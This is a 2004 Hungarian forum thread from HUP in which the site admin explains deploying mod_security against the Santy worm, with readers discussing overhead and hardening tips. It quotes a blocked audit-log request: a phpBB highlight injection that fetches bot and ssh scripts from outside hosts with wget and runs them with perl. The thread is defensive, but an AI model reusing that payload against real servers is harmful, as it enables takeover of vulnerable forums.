Újabb megszorítások a HUP-on

 ( trey | 2004. december 28., kedd - 17:02 )

Ha nem tudsz üzenetet, hozzászólást küldeni a HUP fórumba vagy a cikkekhez, akkor feltétlenül olvasd el ezt az írást!

A karácsony előtt kitört járvány miatt banlistet vezettem be HUP-on. Mivel azonban az User Agent-re való match-elés nem életbiztosítás, a szerveren alkalmazásra került a banlist mellett a mod_security névre hallgató ``Apache Web Intrusion Detection And Prevention'' modul is. Nem véletlenül. Alig egy óra alatt fél megabyte-os lett a modul által generált audit_log file.


A modul lényege, hogy ellentétben a .htaccess + mod_rewrite comboval, nem csak a GET kéréseket tudja értelmezni, hanem a POST-okat is. Aki egy kicsit is ért a támadásokhoz, az nem GET-ként küldi azokat, hanem POST-ként, mert a POST-okat a legtöbb modul nem értelmezi.

A mod_security kicsit paranoiásan lett beállítva, így előfordulhat, hogy egyes hozzászólások, postok, üzenetek akkor is fennakadnak, ha azok alapjában véve nem rossz szándékúak (false positive). Ez abból derül ki, hogy ezt az oldalt látod. Eddig összesen három false positive-nak látszó post került elutasításra a szerver által. Hogy tökéletesíteni lehessen a szűrést, szükség van visszajelzésekre (tesztelni lehet a fórumban itt).

Ha ilyet tapasztalsz, akkor kérlek írj a trey () hup ! hu email címre. A leveledben legyen benne a beküldeni kívánt üzenet!

Köszönöm!

Hozzászólás megjelenítési lehetőségek

A választott hozzászólás megjelenítési mód a „Beállítás” gombbal rögzíthető.

Na ugy latszik en nem akadtam fenn ha ez elment ;)
Reggen en mar neztem egyszer, de akkor "szemmel lathatoan" visszafogta a teljesitmenyet a webservernek ... trey, mik a mostani tapasztalataid, nem jelent jelentosebb overheadet a hasznalata
(sebesseben es/vagy pl memoriahasznalatban)?

Allitolag 10% korul van sebessegben ha a

SecFilterEngine On

beallitas van. Hasznalhatsz helyette

SecFilterEngine DinamicOnly
SecAuditEngine RelevantOnly

beallitast is. A debugot nyilvan ki kell kapcsolni, mert a diszk IO (log iras) a leglassabb. Amugy nem vettem eszre nagy valtozast. Memoriaban semmit, CPU-ban sem latszik semmi kiugro.

Erdemes elolvasni a szerzo cikket az OnLamp-on itt.

Ja a Santy.A, Santy.B, stb. probalkozasokat szepen megfogja. Ez viszi el a legtobbet jelenleg + a referer spammelok.
Percenkent 20-30 van beloluk.

=======================================
UNIQUE_ID: PmcIEcCoAgQAAApNKfkAAAAR
Request: 81.*.*.* - - [28/Dec/2004:17:07:03 +0100] "GET /modules.php?name=Forums&rush=%65%63%68%6F%20%
5F%53%54%41%52%54%5F%3B%20killall%20-9%20perl;
cd%20/tmp;mkdir%20.temp22;cd%20.temp22;wget%20
http://www.abcft.org/themes/bot.htm;wget%20http://http://
weblicious.com/.notes/ssh2.htm;perl%20ssh2.htm;rm%20
ssh.htm;perl%20bot.htm;rm%20bot.htm%3B%20%65%63%
68%6F%20%5F%45%4E%44%5F&highlight=%2527.%70%
61%73%73%74%68%72%75%28%24%48%54%54%50%
5F%47%45%54%5F%56%41%52%53%5B%72%75%73%
68%5D%29.%2527'; HTTP/1.1" 403 1024
Handler: (null)
----------------------------------------
GET /modules.php?name=Forums&rush=%65%63%68%6F%20%
5F%53%54%41%52%54%5F%3B%20killall%20-9%20perl;
cd%20/tmp;mkdir%20.temp22;cd%20.temp22;wget%20
http://www.abcft.org/themes/bot.htm;wget%20http://
http://weblicious.com/.notes/ssh2.htm;perl%20ssh2.htm;rm
%20ssh.htm;perl%20bot.htm;rm%20bot.htm%3B%20%65%
63%68%6F%20%5F%45%4E%44%5F&highlight=%2527.%
70%61%73%73%74%68%72%75%28%24%48%54%54%
50%5F%47%45%54%5F%56%41%52%53%5B%72%75%
73%68%5D%29.%2527'; HTTP/1.1
Connection: close
Host: www.hup.hu
User-Agent: LWP::Simple/5.69
mod_security-message: Access denied with code 403. Pattern match "%27" at CUSTOM
mod_security-action: 403

HTTP/1.1 403 Forbidden
Last-Modified: Sun, 26 Dec 2004 13:49:42 GMT
ETag: "50840-400-177ac980"
Accept-Ranges: bytes
Content-Length: 1024
Connection: close
Content-Type: text/html; charset=ISO-8859-2

Van mit tanulni trey mestertől... :) A fenébe is, miért nem ilyen dolgokkal foglalkozom munkaidőben, miért nem kerülök én is közel az ilyen tűzhöz... Na mindegy, bocs, csak tesztelek :)

Sajnos enis csak almodozom. De nem adom fel!

Tanulni, tanulni, tanulni! (Lenin)

(Csak az iskola ne lenne budos 8) )

Vagy a lábad :) Bocs, de ezt 403-as tesztre küldtem :)

Trey!

Az apache ide vontakozo beallitasokat megosztod velunk (gyk: reszlet copy-paste ;-)

Kosz,
Elbandi

ROTFL :D

Szerintem ha tanulni akarsz és ÉRTENI amit csinálsz, akkor magad kísérletezed ki. Nem egy túlbonyolított dolog. Ha nem próbálkozol és kísérletezel, akkor nem rendszergazda leszel, hanem betanított rendszerfelügyeleti segédmunkás. Nem RTFM, hanem jótanács.

ezen en is gondolkodtam, hogy kerjem-e vagy sem... de most modemmel vagyok es ejjel 2 korul nincs kedvem/idom szetturni a netet hogy megtanuljam a mod_security-t.

Masik meg, hogy egy mukodo peldabol konnyebb tanulni, minthogy valamit osszeganyolok, es azon izgulok, hogy nem b*tam el semmit, es nem k*rjak fel a forumom...

Trey irj egy privatot lenne paar dolog amit tudnek javasolni...
De csak ha erdekel... tudok segiteni ez ugyben...

A Santy ellen az alap configon kivul ennyi kell neked:

http://www.modsecurity.org/blog/archives/000046.html

Tokeletesen mukodik. Ami meg hasznos:

noexec mountolod a /tmp-t, chmod 550 a wget-re, szurod a lwp trivial, LWP::Simple HTTP_USER_AGENT-eket, sot en lehet h tovabbmegyek, es megkovetelem az HTTP_USER_AGENT megletet. Ez utobbival az a baj, hogy nehany newsfeed reader nem kuld semmit, igy azok kimaradnak a jatekbol.

A tobbi, szemelyreszolo beallitast neked kell kikiserletezni, mert en nem tudhatom, hogy kit-mit akarsz meg szurni. Ez olyan mint a spam. En szurom a referer spammeloket is...

Ja es ha a PHP verziod 4.3.10 es a phpBB-det mar joelore megpatchelted ( javitas itt [www.phpbb.com]), akkor tulajdonkeppen ezek mar csak plusz biztositekok, mert a worm ugysem arthat.

> mert a worm ugysem arthat.

A worm nem, de ettol meg mas igen. Szoval ezt hasznalva se lehet nyugodtan hatradolni, mert neked egy lepessel mindig a tamadok elott kell jarni, ami nem konnyu. Sigh.

Hehe trey, ha tényleg csak 3 false positive volt, az mind3 én voltam... pedig csak egy sima url volt a hozzászólásomban. Még akartam is írni levelet emiatt, de aztán láttam, másoknak megy a post, gondoltam biztos vmi pillanatnyi elmezavar, és nem akartalak zavarni... :)

chmod 550 a wget-re

;)))

és a /usr/bin/ftp ? :P

a Santy wget-et hasznal, de igazabol barmire celszeru. :-)

Sot azon gondolkodom, hogy akar a perl-re is. Ha nem hasznalja user a gepen akar le is lehet tepni :-). Problem solved. Persze csak olyan rendszeren, ahol a perl-lel egyutt nem jon le meg a boot record is :-D, mint fuggoseg.